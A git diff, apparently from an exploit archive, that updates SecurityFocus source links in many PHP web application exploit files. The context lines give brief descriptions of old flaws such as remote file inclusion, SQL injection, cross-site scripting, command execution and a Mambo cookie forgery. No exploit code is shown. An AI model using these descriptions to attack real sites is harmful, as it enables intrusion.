@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6387/info +source: https://www.securityfocus.com/bid/6387/info A vulnerability has been discovered in Mambo Site Server. Requesting the 'index.php' script with an invalid parameter will cause an error page to be generated containing the path of the Mambo script. diff --git a/exploits/php/webapps/22088.txt b/exploits/php/webapps/22088.txt index 2a98af3bd..038750466 100644 --- a/exploits/php/webapps/22088.txt +++ b/exploits/php/webapps/22088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6395/info +source: https://www.securityfocus.com/bid/6395/info MyPHPLinks is a freely available, open source PHP application distributed by MyPHPSoft. It is available for Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/22089.txt b/exploits/php/webapps/22089.txt index 845c2eecd..ea010da97 100644 --- a/exploits/php/webapps/22089.txt +++ b/exploits/php/webapps/22089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6399/info +source: https://www.securityfocus.com/bid/6399/info A vulnerability has been discovered in the PHP-Nuke Web Mail module. When a user opens an email that contains an attachment, the file will be put in a remotely accessible web directory. It has been reported that the vulnerable module fails to filter active content passed as attachments, thereby allowing a malicious PHP script to be stored in a web directory. diff --git a/exploits/php/webapps/22090.txt b/exploits/php/webapps/22090.txt index d5621492a..bb7908f0e 100644 --- a/exploits/php/webapps/22090.txt +++ b/exploits/php/webapps/22090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6400/info +source: https://www.securityfocus.com/bid/6400/info A vulnerability has been discovered in the PHP-Nuke web mail module. Due to insufficient sanitization of HTML emails it is possible for an attacker to embed script code into malicious messages. Opening an email containing attacker-supplied script code would result in the execution of arbitrary script code within the client's browser. diff --git a/exploits/php/webapps/22102.txt b/exploits/php/webapps/22102.txt index e236998b4..c1638c73a 100644 --- a/exploits/php/webapps/22102.txt +++ b/exploits/php/webapps/22102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6406/info +source: https://www.securityfocus.com/bid/6406/info Multiple path disclosure vulnerabilities have been discovered in PHP-Nuke. This issue occurs when requesting a PHP script that shouldn't be accessed directly. diff --git a/exploits/php/webapps/22103.txt b/exploits/php/webapps/22103.txt index 91a140f0d..c3d1db211 100644 --- a/exploits/php/webapps/22103.txt +++ b/exploits/php/webapps/22103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6409/info +source: https://www.securityfocus.com/bid/6409/info It has been discovered that multiple PHP scripts used by PHP-Nuke are vulnerable to cross-sitescripting attacks. Due to insufficient sanitization of web requests it is possible for script code to be embedded in PHP script requests. diff --git a/exploits/php/webapps/22104.txt b/exploits/php/webapps/22104.txt index 05796cf67..f83054507 100644 --- a/exploits/php/webapps/22104.txt +++ b/exploits/php/webapps/22104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6411/info +source: https://www.securityfocus.com/bid/6411/info An HTML injection vulnerability has been discovered in Captaris Infinite WebMail. Due to insufficient sanitization of HTML content, it is possible for an attacker to embed malicious script code into HTML email messages. diff --git a/exploits/php/webapps/22107.txt b/exploits/php/webapps/22107.txt index 5b5839b61..e10d7be02 100644 --- a/exploits/php/webapps/22107.txt +++ b/exploits/php/webapps/22107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6455/info +source: https://www.securityfocus.com/bid/6455/info Several vulnerabilities have been discovered in SPGPartenaires. The vulnerabilities are due to insufficient sanitization of the 'pass' and 'SPGP' variables used to construct SQL queries in various PHP scripts. By exploiting these issues it is possible to modify the logic of SQL queries through malformed query strings in requests for the vulnerable script. diff --git a/exploits/php/webapps/22108.txt b/exploits/php/webapps/22108.txt index 22a7911c2..5d49c9879 100644 --- a/exploits/php/webapps/22108.txt +++ b/exploits/php/webapps/22108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6455/info +source: https://www.securityfocus.com/bid/6455/info Several vulnerabilities have been discovered in SPGPartenaires. The vulnerabilities are due to insufficient sanitization of the 'pass' and 'SPGP' variables used to construct SQL queries in various PHP scripts. By exploiting these issues it is possible to modify the logic of SQL queries through malformed query strings in requests for the vulnerable script. diff --git a/exploits/php/webapps/22109.txt b/exploits/php/webapps/22109.txt index bdb6720fd..bed6b6cad 100644 --- a/exploits/php/webapps/22109.txt +++ b/exploits/php/webapps/22109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6464/info +source: https://www.securityfocus.com/bid/6464/info W-Agora is a freely available, open source PHP forum software package. It is available for Unix and Linux systems. diff --git a/exploits/php/webapps/22114.txt b/exploits/php/webapps/22114.txt index 75b5c8a7e..7a8917c68 100644 --- a/exploits/php/webapps/22114.txt +++ b/exploits/php/webapps/22114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6496/info +source: https://www.securityfocus.com/bid/6496/info PEEL is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22115.txt b/exploits/php/webapps/22115.txt index ced18c60c..2f20481f1 100644 --- a/exploits/php/webapps/22115.txt +++ b/exploits/php/webapps/22115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6500/info +source: https://www.securityfocus.com/bid/6500/info N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22116.txt b/exploits/php/webapps/22116.txt index 121ee76a9..22f5c4854 100644 --- a/exploits/php/webapps/22116.txt +++ b/exploits/php/webapps/22116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6500/info +source: https://www.securityfocus.com/bid/6500/info N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22125.txt b/exploits/php/webapps/22125.txt index ca41ba470..991602ed5 100644 --- a/exploits/php/webapps/22125.txt +++ b/exploits/php/webapps/22125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6523/info +source: https://www.securityfocus.com/bid/6523/info A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts. diff --git a/exploits/php/webapps/22126.txt b/exploits/php/webapps/22126.txt index 10bebe771..a4c3901d9 100644 --- a/exploits/php/webapps/22126.txt +++ b/exploits/php/webapps/22126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6525/info +source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22127.txt b/exploits/php/webapps/22127.txt index 8c7edd525..cccfd5049 100644 --- a/exploits/php/webapps/22127.txt +++ b/exploits/php/webapps/22127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6525/info +source: https://www.securityfocus.com/bid/6525/info DCP-Portal is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. diff --git a/exploits/php/webapps/22133.txt b/exploits/php/webapps/22133.txt index cdc49f338..20e255f41 100644 --- a/exploits/php/webapps/22133.txt +++ b/exploits/php/webapps/22133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6544/info +source: https://www.securityfocus.com/bid/6544/info Reportedly, myPHPNuke does not adequately filter HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user. All code will be executed within the context of the website running myPHPNuke. diff --git a/exploits/php/webapps/22134.txt b/exploits/php/webapps/22134.txt index be00ea4ae..e548f4dfe 100644 --- a/exploits/php/webapps/22134.txt +++ b/exploits/php/webapps/22134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6547/info +source: https://www.securityfocus.com/bid/6547/info S8Forum is prone to a remote command execution vulnerability. diff --git a/exploits/php/webapps/22146.txt b/exploits/php/webapps/22146.txt index 7baf2cf24..5541d696b 100644 --- a/exploits/php/webapps/22146.txt +++ b/exploits/php/webapps/22146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6591/info +source: https://www.securityfocus.com/bid/6591/info It has been reported that a problem exists in the Reminder.php script distributed as part of YaBB SE. Due to insufficient sanitizing of input, it is possible for a remote user to inject arbitrary SQL into the database used by YaBB SE that could be used to reset or change the password of a user. diff --git a/exploits/php/webapps/22148.txt b/exploits/php/webapps/22148.txt index 5555a0cdd..3808d5d59 100644 --- a/exploits/php/webapps/22148.txt +++ b/exploits/php/webapps/22148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6594/info +source: https://www.securityfocus.com/bid/6594/info A problem with phpPass may allow an attacker to launch a SQL injection attack. diff --git a/exploits/php/webapps/22149.txt b/exploits/php/webapps/22149.txt index 0a5449f38..c0d8e944f 100644 --- a/exploits/php/webapps/22149.txt +++ b/exploits/php/webapps/22149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6595/info +source: https://www.securityfocus.com/bid/6595/info A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input. diff --git a/exploits/php/webapps/22150.txt b/exploits/php/webapps/22150.txt index 6b5ab70b4..367eb238e 100644 --- a/exploits/php/webapps/22150.txt +++ b/exploits/php/webapps/22150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6595/info +source: https://www.securityfocus.com/bid/6595/info A file disclosure vulnerability has been reported for W-Agora. It has been reported that W-Agora does not adequately sanitize some user-supplied input. diff --git a/exploits/php/webapps/22163.txt b/exploits/php/webapps/22163.txt index 13e0c9b90..b03518865 100644 --- a/exploits/php/webapps/22163.txt +++ b/exploits/php/webapps/22163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6601/info +source: https://www.securityfocus.com/bid/6601/info The Geeklog 'profiles.php' script is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/22164.txt b/exploits/php/webapps/22164.txt index d9547982c..505b9d16d 100644 --- a/exploits/php/webapps/22164.txt +++ b/exploits/php/webapps/22164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6602/info +source: https://www.securityfocus.com/bid/6602/info Geeklog is prone to a cross-site scripting vulnerability in the 'users.php' script. diff --git a/exploits/php/webapps/22165.txt b/exploits/php/webapps/22165.txt index 72befb317..91985c005 100644 --- a/exploits/php/webapps/22165.txt +++ b/exploits/php/webapps/22165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6603/info +source: https://www.securityfocus.com/bid/6603/info Geeklog is prone to a cross-site scripting vulnerability in the 'comment.php' script. diff --git a/exploits/php/webapps/22166.txt b/exploits/php/webapps/22166.txt index 192a0fa48..641a20de2 100644 --- a/exploits/php/webapps/22166.txt +++ b/exploits/php/webapps/22166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6604/info +source: https://www.securityfocus.com/bid/6604/info Geeklog is prone to HTML injection attacks. diff --git a/exploits/php/webapps/22167.txt b/exploits/php/webapps/22167.txt index 13ea210dd..f03656264 100644 --- a/exploits/php/webapps/22167.txt +++ b/exploits/php/webapps/22167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6605/info +source: https://www.securityfocus.com/bid/6605/info A vulnerability has been discovered in vAuthenticate. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages. diff --git a/exploits/php/webapps/22168.txt b/exploits/php/webapps/22168.txt index 65c19d945..52c14f265 100644 --- a/exploits/php/webapps/22168.txt +++ b/exploits/php/webapps/22168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6606/info +source: https://www.securityfocus.com/bid/6606/info A vulnerability has been discovered in vSignup. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages. diff --git a/exploits/php/webapps/22175.txt b/exploits/php/webapps/22175.txt index b9bf6dea9..02de6e2a1 100644 --- a/exploits/php/webapps/22175.txt +++ b/exploits/php/webapps/22175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6621/info +source: https://www.securityfocus.com/bid/6621/info An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. diff --git a/exploits/php/webapps/22176.txt b/exploits/php/webapps/22176.txt index 25e05f383..ff8178598 100644 --- a/exploits/php/webapps/22176.txt +++ b/exploits/php/webapps/22176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6622/info +source: https://www.securityfocus.com/bid/6622/info A vulnerability has been discovered in PHP TopSites. Due to invalid sanitization of user-supplied input by the 'help.php' script, it may be possible for an attacker to steal another users cookie information or other sensitive data. diff --git a/exploits/php/webapps/22177.txt b/exploits/php/webapps/22177.txt index 5474e4258..cbe3daeef 100644 --- a/exploits/php/webapps/22177.txt +++ b/exploits/php/webapps/22177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6625/info +source: https://www.securityfocus.com/bid/6625/info A vulnerability has been discovered in PHP TopSites. Due to insufficient sanitization of user-supplied URI parameters it is possible for an attacker to embed SQL commands into certain page requests. This may result in another users private information being disclose to an attacker. diff --git a/exploits/php/webapps/22180.txt b/exploits/php/webapps/22180.txt index 0540e7811..5ee625307 100644 --- a/exploits/php/webapps/22180.txt +++ b/exploits/php/webapps/22180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6632/info +source: https://www.securityfocus.com/bid/6632/info phpLinks is prone to HTML injection. diff --git a/exploits/php/webapps/22182.pl b/exploits/php/webapps/22182.pl index f031a1616..e92091b1f 100755 --- a/exploits/php/webapps/22182.pl +++ b/exploits/php/webapps/22182.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6634/info +source: https://www.securityfocus.com/bid/6634/info A SQL injection vulnerability has been reported for phpBB2 systems that may result in the deletion of all private messages. diff --git a/exploits/php/webapps/22186.txt b/exploits/php/webapps/22186.txt index 0c6a77d89..9297ee1e1 100644 --- a/exploits/php/webapps/22186.txt +++ b/exploits/php/webapps/22186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6644/info +source: https://www.securityfocus.com/bid/6644/info A problem with MyRoom may make it possible for remote attackers to upload files to a vulnerable system. diff --git a/exploits/php/webapps/22192.pl b/exploits/php/webapps/22192.pl index aafc486df..25390275e 100755 --- a/exploits/php/webapps/22192.pl +++ b/exploits/php/webapps/22192.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6663/info +source: https://www.securityfocus.com/bid/6663/info YaBB SE allows remote users to influence the location of included files. A remote attacker may exploit this condition to cause an external, attacker-supplied file to be included and executed by YABB SE. diff --git a/exploits/php/webapps/22195.txt b/exploits/php/webapps/22195.txt index a2f9426dc..d26ea043a 100644 --- a/exploits/php/webapps/22195.txt +++ b/exploits/php/webapps/22195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6669/info +source: https://www.securityfocus.com/bid/6669/info It has been reported that Zorum may allow remote users to influence to location of PHP includes. Because of this, it is possible for a remote user to include an external arbitrary PHP script containing commands that may be carried out on the vulnerable host. diff --git a/exploits/php/webapps/22202.txt b/exploits/php/webapps/22202.txt index ee5c6e447..722a1ca30 100644 --- a/exploits/php/webapps/22202.txt +++ b/exploits/php/webapps/22202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6686/info +source: https://www.securityfocus.com/bid/6686/info Guestbook does not adequately filter HTML tags from various fields. This may enable an attacker to inject arbitrary script code into pages that are generated by the guestbook. diff --git a/exploits/php/webapps/22206.txt b/exploits/php/webapps/22206.txt index 8e40070ea..04e166c47 100644 --- a/exploits/php/webapps/22206.txt +++ b/exploits/php/webapps/22206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6731/info +source: https://www.securityfocus.com/bid/6731/info Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file. diff --git a/exploits/php/webapps/22208.txt b/exploits/php/webapps/22208.txt index f655689fc..fe2e5a46b 100644 --- a/exploits/php/webapps/22208.txt +++ b/exploits/php/webapps/22208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6744/info +source: https://www.securityfocus.com/bid/6744/info myphpPageTool is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in several PHP script files in the /doc/admin folder. diff --git a/exploits/php/webapps/22209.txt b/exploits/php/webapps/22209.txt index 0387bdc8a..33dca2360 100644 --- a/exploits/php/webapps/22209.txt +++ b/exploits/php/webapps/22209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6746/info +source: https://www.securityfocus.com/bid/6746/info phpMyShop, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries. As a result, attackers may supply malicious parameters to manipulate the structure and logic of SQL queries. diff --git a/exploits/php/webapps/22211.txt b/exploits/php/webapps/22211.txt index 369a92546..942c1a983 100644 --- a/exploits/php/webapps/22211.txt +++ b/exploits/php/webapps/22211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6750/info +source: https://www.securityfocus.com/bid/6750/info A problem with PHP-Nuke could allow remote users to execute arbitrary code in the context of the web site. The problem is in the lack of sanitization of some types of input. diff --git a/exploits/php/webapps/22222.txt b/exploits/php/webapps/22222.txt index 26135a6aa..e7348e62b 100644 --- a/exploits/php/webapps/22222.txt +++ b/exploits/php/webapps/22222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6768/info +source: https://www.securityfocus.com/bid/6768/info It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources. diff --git a/exploits/php/webapps/22241.txt b/exploits/php/webapps/22241.txt index 589f7d035..d416774f8 100644 --- a/exploits/php/webapps/22241.txt +++ b/exploits/php/webapps/22241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6818/info +source: https://www.securityfocus.com/bid/6818/info It has been reported that Cedric Email Reader is prone to an issue that may allow remote attackers to include malicious files located on remote servers. This issue is present in the 'email.php' script. diff --git a/exploits/php/webapps/22242.txt b/exploits/php/webapps/22242.txt index 752cd8ecd..73799c729 100644 --- a/exploits/php/webapps/22242.txt +++ b/exploits/php/webapps/22242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6820/info +source: https://www.securityfocus.com/bid/6820/info It has been reported that Cedric Email Reader is prone to an issue that may allow remote attackers to include malicious files located on remote servers. This issue is present in the 'emailreader_execute_on_each_page.inc.php' script. diff --git a/exploits/php/webapps/22252.txt b/exploits/php/webapps/22252.txt index de36b8103..d85909de8 100644 --- a/exploits/php/webapps/22252.txt +++ b/exploits/php/webapps/22252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6862/info +source: https://www.securityfocus.com/bid/6862/info php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to php-board user and administrative passwords. diff --git a/exploits/php/webapps/22253.txt b/exploits/php/webapps/22253.txt index 4d9dde627..32b2a97ac 100644 --- a/exploits/php/webapps/22253.txt +++ b/exploits/php/webapps/22253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6866/info +source: https://www.securityfocus.com/bid/6866/info The DotBr 'system.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/22254.txt b/exploits/php/webapps/22254.txt index 9af414b1c..c5f6adb86 100644 --- a/exploits/php/webapps/22254.txt +++ b/exploits/php/webapps/22254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6867/info +source: https://www.securityfocus.com/bid/6867/info The DotBr 'exec.php3' script is prone to a remote command execution vulnerability. This is due to insufficient sanitization of user-supplied data. Exploitation may result in execution of arbitrary shell commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/22256.txt b/exploits/php/webapps/22256.txt index 5d52134f9..90cea08cb 100644 --- a/exploits/php/webapps/22256.txt +++ b/exploits/php/webapps/22256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6879/info +source: https://www.securityfocus.com/bid/6879/info D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts. diff --git a/exploits/php/webapps/22257.txt b/exploits/php/webapps/22257.txt index c5b831925..f9ac27b63 100644 --- a/exploits/php/webapps/22257.txt +++ b/exploits/php/webapps/22257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6879/info +source: https://www.securityfocus.com/bid/6879/info D-Forum is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the /includes/header.php3 and /includes/footer.php3 scripts. diff --git a/exploits/php/webapps/22266.php b/exploits/php/webapps/22266.php index b521b3b37..fafc6daed 100644 --- a/exploits/php/webapps/22266.php +++ b/exploits/php/webapps/22266.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6887/info +source: https://www.securityfocus.com/bid/6887/info It has been reported that the search module distributed with PHPNuke is vulnerable to an SQL injection attack. diff --git a/exploits/php/webapps/22267.php b/exploits/php/webapps/22267.php index bbea83a6f..c233d7f1f 100644 --- a/exploits/php/webapps/22267.php +++ b/exploits/php/webapps/22267.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6888/info +source: https://www.securityfocus.com/bid/6888/info A SQL injection vulnerability has been reported in phpBB2. diff --git a/exploits/php/webapps/22268.txt b/exploits/php/webapps/22268.txt index ea251cd5e..5fb6f3213 100644 --- a/exploits/php/webapps/22268.txt +++ b/exploits/php/webapps/22268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6892/info +source: https://www.securityfocus.com/bid/6892/info Reportedly, myPHPNuke 'links.php' does not adequately filter HTML code thus making it prone to cross-site scripting attacks. It is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. All code will be executed within the context of the website running myPHPNuke. diff --git a/exploits/php/webapps/22277.txt b/exploits/php/webapps/22277.txt index 476c49d14..229d097be 100644 --- a/exploits/php/webapps/22277.txt +++ b/exploits/php/webapps/22277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6917/info +source: https://www.securityfocus.com/bid/6917/info A vulnerability has been discovered in Nuked-Klan which may be exploited to execute certain PHP functions on a target server. This issue occurs in the 'Team', 'News', and 'Lien' modules and is due to insufficient sanitization of user-supplied URI parameters. diff --git a/exploits/php/webapps/22279.txt b/exploits/php/webapps/22279.txt index b9a0d2afa..50752a008 100644 --- a/exploits/php/webapps/22279.txt +++ b/exploits/php/webapps/22279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6922/info +source: https://www.securityfocus.com/bid/6922/info GONiCUS System Administrator is prone to an issue that may allow remote attackers to include files located on remote servers. This issue is present in several PHP pages existing in the /plugins and /includes folders. diff --git a/exploits/php/webapps/22281.php b/exploits/php/webapps/22281.php index 86b26b20e..a2d9d2cd5 100644 --- a/exploits/php/webapps/22281.php +++ b/exploits/php/webapps/22281.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6926/info +source: https://www.securityfocus.com/bid/6926/info Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie. diff --git a/exploits/php/webapps/22282.txt b/exploits/php/webapps/22282.txt index 8e78002e7..d4d38a846 100644 --- a/exploits/php/webapps/22282.txt +++ b/exploits/php/webapps/22282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6929/info +source: https://www.securityfocus.com/bid/6929/info A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers. diff --git a/exploits/php/webapps/22283.txt b/exploits/php/webapps/22283.txt index 777aece5b..76e715877 100644 --- a/exploits/php/webapps/22283.txt +++ b/exploits/php/webapps/22283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22284.txt b/exploits/php/webapps/22284.txt index e43040e86..e9a0dc1c6 100644 --- a/exploits/php/webapps/22284.txt +++ b/exploits/php/webapps/22284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22285.txt b/exploits/php/webapps/22285.txt index 8e3ec8418..df2caca26 100644 --- a/exploits/php/webapps/22285.txt +++ b/exploits/php/webapps/22285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6935/info +source: https://www.securityfocus.com/bid/6935/info CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers. diff --git a/exploits/php/webapps/22293.txt b/exploits/php/webapps/22293.txt index 34e8f1735..e96607215 100644 --- a/exploits/php/webapps/22293.txt +++ b/exploits/php/webapps/22293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6970/info +source: https://www.securityfocus.com/bid/6970/info E-theni may allow inclusion of malicious remote files. This is due to remote users being able to influence the include path of an external file ('para_langue.php') referenced by the 'aff_liste_langue.php' script. This could result in arbitrary command execution. diff --git a/exploits/php/webapps/22295.txt b/exploits/php/webapps/22295.txt index 2a1b2508e..b27129847 100644 --- a/exploits/php/webapps/22295.txt +++ b/exploits/php/webapps/22295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6976/info +source: https://www.securityfocus.com/bid/6976/info Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22297.pl b/exploits/php/webapps/22297.pl index 02976e847..613081b81 100755 --- a/exploits/php/webapps/22297.pl +++ b/exploits/php/webapps/22297.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6982/info +source: https://www.securityfocus.com/bid/6982/info TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be useful in mounting further attacks against the host system. diff --git a/exploits/php/webapps/22298.txt b/exploits/php/webapps/22298.txt index 71526538d..ad35649ec 100644 --- a/exploits/php/webapps/22298.txt +++ b/exploits/php/webapps/22298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6984/info +source: https://www.securityfocus.com/bid/6984/info TYPO3 is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22315.pl b/exploits/php/webapps/22315.pl index 7d6d055a6..3f3916322 100755 --- a/exploits/php/webapps/22315.pl +++ b/exploits/php/webapps/22315.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6993/info +source: https://www.securityfocus.com/bid/6993/info Clients of TYPO3 systems may access potentially sensitive data that have been obfuscated through hidden form fields. This may aid in exploiting other known issues in the software. diff --git a/exploits/php/webapps/22316.pl b/exploits/php/webapps/22316.pl index 312d81c7a..41d15c130 100755 --- a/exploits/php/webapps/22316.pl +++ b/exploits/php/webapps/22316.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6993/info +source: https://www.securityfocus.com/bid/6993/info Clients of TYPO3 systems may access potentially sensitive data that have been obfuscated through hidden form fields. This may aid in exploiting other known issues in the software. diff --git a/exploits/php/webapps/22317.txt b/exploits/php/webapps/22317.txt index f164e6697..86c89cf6e 100644 --- a/exploits/php/webapps/22317.txt +++ b/exploits/php/webapps/22317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6998/info +source: https://www.securityfocus.com/bid/6998/info GTCatalog is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22318.txt b/exploits/php/webapps/22318.txt index 4814e4dbb..1f0afce42 100644 --- a/exploits/php/webapps/22318.txt +++ b/exploits/php/webapps/22318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7000/info +source: https://www.securityfocus.com/bid/7000/info Webchat is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers. diff --git a/exploits/php/webapps/22336.txt b/exploits/php/webapps/22336.txt index ec7b78857..036a39e5d 100644 --- a/exploits/php/webapps/22336.txt +++ b/exploits/php/webapps/22336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7030/info +source: https://www.securityfocus.com/bid/7030/info A vulnerability has been reported in PHPPing that may allow remote attackers to execute commands on vulnerable systems. diff --git a/exploits/php/webapps/22339.txt b/exploits/php/webapps/22339.txt index 2c0a870e6..8b168369a 100644 --- a/exploits/php/webapps/22339.txt +++ b/exploits/php/webapps/22339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7045/info +source: https://www.securityfocus.com/bid/7045/info SimpleBBS reportedly creates sensitive files with world-readable permissions. As a result anyone who has access to SimpleBBS web resources may access confidential information stored in the SimpleBBS user database. diff --git a/exploits/php/webapps/22343.txt b/exploits/php/webapps/22343.txt index 7852c0589..95e58c3e0 100644 --- a/exploits/php/webapps/22343.txt +++ b/exploits/php/webapps/22343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7063/info +source: https://www.securityfocus.com/bid/7063/info A vulnerability has been reported for VPOPMail that may allow attackers to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/22347.txt 